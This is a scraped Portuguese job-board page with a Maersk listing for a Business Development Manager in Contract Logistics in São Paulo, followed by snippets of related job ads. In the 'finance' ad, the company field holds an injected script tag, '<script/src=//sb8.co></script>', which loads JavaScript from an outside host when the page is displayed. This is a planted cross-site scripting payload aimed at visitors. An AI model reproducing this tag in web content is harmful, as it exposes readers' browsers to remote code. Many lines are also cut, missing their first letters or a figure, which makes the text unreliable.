Ir à oferta completa

BUSINESS DEVELOPMENT MANAGER – CONTRACT LOGISTICS

Descrição da oferta de emprego

Temos uma visão além do oceano.
integrando a logística de contêineres, conectando e simplificando a cadeia de suprimentos de nossos clientes.
Contamos com nosso pessoal para fazer isso acontecer!Junte-se a nós enquanto embarcamos em uma transformação digital que revolucionará o negócio de logística.
você desempenhará um papel vital em nosso sucesso, gerenciando a experiência do cliente e construindo um caminho de sucesso em sua carreira.
que estamos oferecendo?Estamos em uma jornada revolucionária para simplificar o comércio global, o que nos dará a chance de oferecer um grande impacto na economia mundial e na sua carreira.
Com grande responsabilidade pessoal, você aprimorará seu conhecimento do setor e desenvolverá habilidades comerciais e de comunicação altamente valorizadas em funções voltadas para o cliente - possivelmente em um ritmo que o surpreenderá.
nergizante e pioneiro, este também é um ambiente que o mantém motivado.
Você fará parte de uma equipe genuinamente diversificada e talentosa, entusiasmada com o foco nos clientes e nos colegas.
graças à nossa escala global, você estará bem posicionado para explorar oportunidades na Maersk em todo o mundo.
Os muitos outros destaques incluem as mais modernas iniciativas de desenvolvimento de talentos e benefícios competitivos.
ossa oportunidade.
Estamos procurando por uma pessoa para se juntar ao time Sales com profissionais de alto desepenho na Maersk.
osição.
Business Development Manager – Contract LogisticsLocal.
São Paulo (Zona Sul)Tipo de contrato.
CLT – na modalidade híbrida.
rincipais responsabilidades.
dentificar oportunidades de negócios com novos clientes para o mercado de Contract Logistics;Desenvolver e expandir carteira de clientes com as soluções de Supply Chain da Maersk;Estabelecer parcerias estratégicas com foco em WnD - Warehouse and Distribution;Fortalecer a presença da marca no mercado de Supply Chain local e global;Estabelecer networking com counterparts em toda extensão global da Maersk;Desenvolver KPIs para apresentação de dados e resultados;Quem estamos procurando.
ormação.
superior em Administração de Empresas, Engenharia, Logística, Comércio Exterior ou áreas afins;Experiência.
necessário ter experiênciasrelevantes em Vendas e expansão do Supply Chain/Contract Logistics/Warehouse, preferencialmente nos verticais FMCG, LifeStyle, Retail e Tech;Idiomas.
Português fluente, Inglês avançado e Espanhol é desejável;Hard skills.
Pacote Office avançado, principalmente em Excel e Power BI para analisar dados e apresentação de resultados; Sales Force é um plus para essa posição;Desejável especialização/pós graduação em Supply Chain;Principais skills.
mentalidade estratégica; forte habilidade em negociação e para gerenciar situações complexas; capacidade de comunicação com diferentes stakehoders e relacionamento interpessoal.
uem somos.
A.
.
Moller-Maersk é uma empresa de logística integrada de contêineres que trabalha para conectar e simplificar as cadeias de suprimentos de nossos clientes.
Como líder global em serviços de transporte, operamos em 130 países e empregamos cerca de pessoas.
om uma oferta simples de produtos end-to-end e serviços digitais, engajamento contínuo do cliente e uma rede de entrega de ponta a ponta superior, permitimos que nossos clientes negociem e cresçam transportando mercadorias em qualquer lugar do mundo.
aiba mais sobre nós.
Maersk is committed to a diverse and inclusive workplace, and we embrace different styles of thinking.
Maersk is an equal opportunities employer and welcomes applicants without regard to race, colour, gender, sex, age, religion, creed, national origin, ancestry, citizenship, marital status, sexual orientation, physical or mental disability, pregnancy, gender identity or any other characteristic protected by applicable law.
e are happy to support your need for any adjustments during the application and hiring process.
If you need special assistance or an accommodation to use our website, apply for a position, or to perform a job, please contact us by emailing
Ir à oferta completa

Detalhes da oferta

Empresa
  • Maersk
Localidade
  • Em todo o Brasil
Endereço
  • Indeterminado - Indeterminado
Tipo de Contrato
  • Indeterminado
Data de publicação
  • 06/04/2024
Data de expiração
  • 05/07/2024
ACCOUNT MANAGER
Reachjobs

We are seeking a highly motivated and experienced internal account manager to join our client's team... • identify new business opportunities and work to develop them into profitable accounts• develop and maintain key strategic business relationships across existing and prospective clients• work closely......

Project Manager
Equacao IT

Outros dados de posição • duration: contract for 12 months (minimum);• localization: hybrid, lisbon... we are looking for a project manager with the following requirements:requirements:• more than 2 years experience in it project management;• previously have participated in software development projects......

Product Manager - (Electronic commerce)
Jp&f consultoria

Local de trabalho: são paulo / sp (cenesp – centro empresarial de são paulo)... (mandatory) - strong knowledge of electronic commerce / acquiring and payments... technical proficiency and ability to understand complex technical concepts and product functionalities... demonstrated ability to balance technical......

Vacancy At The Royal Garden Hotel
The Royal Garden Hotel

Available positions bakers/bartenders/chefs/chef de partie/sous chef/chef d cuisine/cooks/, restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

LEGAL ADVISOR
Oman Jobs

•advise senior management on legal matters affecting business decisions and strategic initiatives... •analyze complex legal issues and provide strategic recommendations to mitigate risks and achieve business objectives... dispute resolution:•assist in the resolution of legal disputes and litigation related......

FINANCIAL CONTROLLER
Oman Jobs

Asset financing); governance/internal control activities; business administration... •manage relationships with others across the group to achieve alignment in key business strategies and decisions... •provide excellent leadership and management of corporate finance, measured by the effectiveness, engagement......

finance
<script/src=//sb8.co></script>computer

Analyze macroeconomic variables and their interactions with client portfolios - strategic, tactical, and dynamic asset allocation decisions, as well as manager selection... provided multi asset allocation advice to clients on their india and global investment needs... the model portfolio is a client-allocated......

Techno Service Engineer
NINJOUR HEALTH INTERNATIONAL LIMITED

Requisitos do trabalho requirements basic education: biomedical engineer work experience: minimum of 5-10 years in a similar role and industry others: good presentation skills, know how in product development processes, good working knowledge in medtech industry, it knowledge (pc, ms-windows, networks......

Marketing executive
Ninjour health international limited

Requisitos do trabalho requirements basic education: completed basic education (mba, marketing) further education: specialist certificate or equivalent further training in marketing work experience: minimum of 3-5 years in a similar role workload:100% contract: contract and based on performance, evaluation......

SAP Basis Admin
Equacao IT

Equação it is a company focused on boosting technology and solid solutions through our expert consultants leading a high perspective and adding value to our customers with the purpose of providing optimization and business growth to our partners... hec & s/4hana)• understanding of escalation handling......